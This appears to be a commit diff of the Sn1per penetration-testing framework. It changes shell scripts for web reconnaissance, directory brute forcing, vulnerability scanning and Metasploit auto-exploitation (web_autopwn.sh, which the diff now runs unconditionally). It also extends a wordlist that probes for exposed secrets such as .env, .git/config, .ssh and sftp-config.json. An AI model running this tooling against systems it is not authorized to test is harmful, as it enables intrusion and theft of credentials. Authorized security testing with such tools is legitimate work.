python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x 400,404,405,406,429,500,502,503,504 -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-common.txt
|
||||
|
|
@ -220,7 +226,7 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -x 400,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -x 400,404,405,406,429,500,502,503,504 -F -e "/" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-full.txt
|
||||
|
|
@ -231,7 +237,7 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x 400,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x 400,404,405,406,429,500,502,503,504 -F -e "/" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-exploits.txt
|
||||
|
|
@ -305,12 +311,15 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
rm -f $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw 2> /dev/null
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
if [[ $METASPLOIT_EXPLOIT = "1" ]]; then
|
||||
SSL="false"
|
||||
source modes/web_autopwn.sh
|
||||
fi
|
||||
|
||||
SSL="false"
|
||||
source modes/web_autopwn.sh
|
||||
source modes/osint_stage_2.sh
|
||||
|
||||
fi
|
||||
|
||||
source modes/sc0pe.sh
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
|
|||
|
|
@ -84,9 +84,9 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 https://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R https://$TARGET:$PORT | tee $LOOT_DIR/web/headers-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R -L https://$TARGET:$PORT | tee $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s -R -X OPTIONS https://$TARGET:$PORT | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R --insecure https://$TARGET:$PORT | tee $LOOT_DIR/web/headers-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R -L --insecure https://$TARGET:$PORT | tee $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s -R --insecure -X OPTIONS https://$TARGET:$PORT | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port$PORT.txt 2> /dev/null
|
||||
if [[ "$WEBTECH" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
|
||||
|
|
@ -194,6 +194,12 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://api.hackertarget.com/pagelinks/?q=https://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid" | tee $LOOT_DIR/web/hackertarget-https-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$GUA" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING GUA URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
gua2 -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$BLACKWIDOW" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
|
|
@ -206,6 +212,7 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
cat $LOOT_DIR/web/hackertarget-*-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
|
||||
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
|
|
@ -224,8 +231,7 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_STEALTH -x 400,404,405,406,429,502,503,504 -F -e $WEB_BRUTE_EXTENSIONS -f -r -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x 400,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x 400,404,405,406,429,500,502,503,504 -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_COMMON -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-common.txt -fw -r
|
||||
|
|
@ -236,7 +242,7 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -x 400,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -x 400,404,405,406,429,500,502,503,504 -F -e "/" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-full.txt -fw -r
|
||||
|
|
@ -247,7 +253,7 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x 400,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x 400,404,405,406,429,500,502,503,504 -F -e "/" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-exploits.txt -fw -r
|
||||
|
|
@ -314,12 +320,15 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
cd $INSTALL_DIR
|
||||
fi
|
||||
cd $INSTALL_DIR
|
||||
if [[ "$METASPLOIT_EXPLOIT" == "1" ]]; then
|
||||
SSL="true"
|
||||
source modes/web_autopwn.sh
|
||||
fi
|
||||
|
||||
SSL="true"
|
||||
source modes/web_autopwn.sh
|
||||
source modes/osint_stage_2.sh
|
||||
|
||||
fi
|
||||
|
||||
source modes/sc0pe.sh
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
|
|||
|
|
@ -50,6 +50,18 @@ if [[ "$MODE" = "webscan" ]]; then
|
|||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
SSL="false"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-scan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-active-scan.sh
|
||||
SSL="true"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-scan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-active-scan.sh
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
fi
|
||||
if [[ "$BURP_SCAN" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
|
||||
|
|
@ -80,6 +92,23 @@ if [[ "$MODE" = "webscan" ]]; then
|
|||
|
||||
echo "[-] Done!"
|
||||
fi
|
||||
if [[ "$ZAP_SCAN" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING OWASP ZAP SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "[i] Scanning: http://$TARGET/"
|
||||
sudo python3 /usr/share/sniper/bin/zap-scan.py "http://$TARGET/"
|
||||
DATE=$(date +"%Y%m%d%H%M")
|
||||
sudo grep "'" /usr/share/sniper/bin/zap-report.txt | cut -d\' -f2 | cut -d\\ -f1 > $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html
|
||||
echo "[i] Scan complete."
|
||||
echo "[+] Report saved to: $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html"
|
||||
sleep 5
|
||||
echo "[i] Scanning: https://$TARGET/"
|
||||
sudo python3 /usr/share/sniper/bin/zap-scan.py "https://$TARGET/"
|
||||
sudo grep "'" /usr/share/sniper/bin/zap-report.txt | cut -d\' -f2 | cut -d\\ -f1 > $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html
|
||||
echo "[i] Scan complete."
|
||||
echo "[+] Report saved to: $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html"
|
||||
fi
|
||||
if [[ "$ARACHNI_SCAN" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ARACHNI SCAN $RESET"
|
||||
|
|
@ -105,6 +134,11 @@ if [[ "$MODE" = "webscan" ]]; then
|
|||
unzip arachni.zip
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
source modes/sc0pe.sh
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
loot
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
|
|
|
|||
1
sniper
1
sniper
|
|
@ -400,6 +400,7 @@ function init {
|
|||
mkdir $LOOT_DIR/osint 2> /dev/null
|
||||
mkdir $LOOT_DIR/credentials 2> /dev/null
|
||||
mkdir $LOOT_DIR/web 2> /dev/null
|
||||
mkdir $LOOT_DIR/vulnerabilities 2> /dev/null
|
||||
mkdir $LOOT_DIR/notes 2> /dev/null
|
||||
mkdir -p $LOOT_DIR/scans/scheduled/ 2> /dev/null
|
||||
touch $LOOT_DIR/scans/scheduled/daily.sh 2> /dev/null
|
||||
|
|
|
|||
34
sniper.conf
34
sniper.conf
File diff suppressed because one or more lines are too long
File diff suppressed because it is too large
Load Diff
|
|
@ -1,4 +1,3 @@
|
|||
lbs
|
||||
$defaultview?Readviewentries
|
||||
actuator/env
|
||||
actuator/health
|
||||
|
|
@ -7,6 +6,7 @@ AddressBookJ2WE/services/AddressBook
|
|||
admin
|
||||
Admin
|
||||
admin-console
|
||||
administrator
|
||||
AlbumCatalogWeb
|
||||
api
|
||||
AppManagementStatus
|
||||
|
|
@ -28,6 +28,8 @@ crossdomain.xml
|
|||
css
|
||||
.csv
|
||||
data
|
||||
deployment-config.json
|
||||
dispatcher/invalidate.cache
|
||||
Dockerfile
|
||||
.DS_Store
|
||||
elmah.axd
|
||||
|
|
@ -35,6 +37,8 @@ en-US/splunkd/__raw/services/server/info/server-info?output_mode=json
|
|||
.env
|
||||
env
|
||||
errorlog.axd
|
||||
.ftpconfig
|
||||
ftpsync.settings
|
||||
.git
|
||||
.git/config
|
||||
.gitignore
|
||||
|
|
@ -61,6 +65,7 @@ invoker/JMXInvokerServlet
|
|||
jmx-console
|
||||
jmx-console/HtmlAdaptor
|
||||
js
|
||||
lbs
|
||||
Makefile
|
||||
;/..;/manager
|
||||
manager/html
|
||||
|
|
@ -75,6 +80,7 @@ pview/
|
|||
readme.md
|
||||
readme.txt
|
||||
register/check/username?username=thisaccountdoesntexist
|
||||
.remote-sync.json
|
||||
robots.txt
|
||||
script
|
||||
scripts
|
||||
|
|
@ -83,6 +89,7 @@ securityRealm/createAccount
|
|||
server-info
|
||||
server-manager/html
|
||||
server-status
|
||||
sftp-config.json
|
||||
signup
|
||||
sitemap.xml
|
||||
.ssh
|
||||
|
|
@ -101,6 +108,8 @@ userContent/
|
|||
users
|
||||
view/All/builds
|
||||
view/All/newjob
|
||||
.vscode/ftp-sync.json
|
||||
.vscode/sftp.json
|
||||
_vti_bin/
|
||||
_vti_bin/sites.asmx?wsdl
|
||||
_vti_bin/spsdisco.aspx
|
||||
|
|
@ -130,4 +139,3 @@ wp-content/plugins/easy-wp-smtp/readme.txt
|
|||
wp-json/wp/v2/users
|
||||
wp-login.php?action=register
|
||||
xmlrpc.php
|
||||
dispatcher/invalidate.cache
|
||||
Loading…
Reference in New Issue